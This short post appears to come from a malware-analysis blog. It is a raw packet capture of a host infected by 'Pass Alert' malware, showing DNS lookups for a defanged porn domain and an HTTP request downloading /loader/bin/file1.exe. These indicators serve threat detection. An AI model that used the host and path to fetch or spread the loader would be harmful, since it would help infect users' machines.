PassAlert Pass Alert Porn Malware Botnet

By | June 19, 2015

2013-05-12 16:13:41.237980 IP 172.16.253.240.53 > 8.8.8.8.53: 34127+ A? porno-video-free[.]com. (38)
E..B……………..5.5…..O………..porno-video-free[.]com…..
2013-05-12 16:13:41.238039 IP 172.16.253.240.53 > 4.2.2.2.53: 34127+ A? porno-video-free[.]com. (38)
E..B……………..5.5…..O………..porno-video-free[.]com…..
2013-05-12 16:13:41.265029 IP 8.8.8.8.53 > 172.16.253.240.53: 34127 1/0/0 A 64.74.223.10 (54)
E..R……………..5.5.>…O………..porno-video-free[.]com……………..@J.

2013-05-12 16:13:41.270894 IP 172.16.253.240.1033 > 64.74.223.10.80: Flags [S], seq 3097962556, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…1Z….@J.
. .P..(<....p...............
2013-05-12 16:13:41.284000 IP 64.74.223.10.80 > 172.16.253.240.1033: Flags [S.], seq 910574124, ack 3097962557, win 64240, options [mss 1460], length 0
E..,……..@J.
…..P. 6FB,..(=`…v………
2013-05-12 16:13:41.284076 IP 172.16.253.240.1033 > 64.74.223.10.80: Flags [.], ack 1, win 64240, length 0
E..(..@…1a….@J.
. .P..(=6FB-P…….
2013-05-12 16:13:41.284321 IP 172.16.253.240.1033 > 64.74.223.10.80: Flags [P.], seq 1:92, ack 1, win 64240, length 91
E…..@…1…..@J.
. .P..(=6FB-P…….GET /loader/bin/file1.exe HTTP/1.1
User-Agent: Mozilla/5.0
Host: porno-video-free[.]com

2013-05-12 16:13:41.284487 IP 64.74.223.10.80 > 172.16.253.240.1033: Flags [.], ack 92, win 64240, length 0
E..(……..@J.
…..P. 6FB-..(.P………….
2013-05-12 16:13:41.296376 IP 4.2.2.2.53 > 172.16.253.240.53: 34127 1/0/0 A 64.74.223.10 (54)
E..R……………..5.5.>…O………..porno-video-free[.]com……………..@J.

2013-05-12 16:13:41.297893 IP 64.74.223.10.80 > 172.16.253.240.1033: Flags [R.], seq 1, ack 92, win 64240, length 0
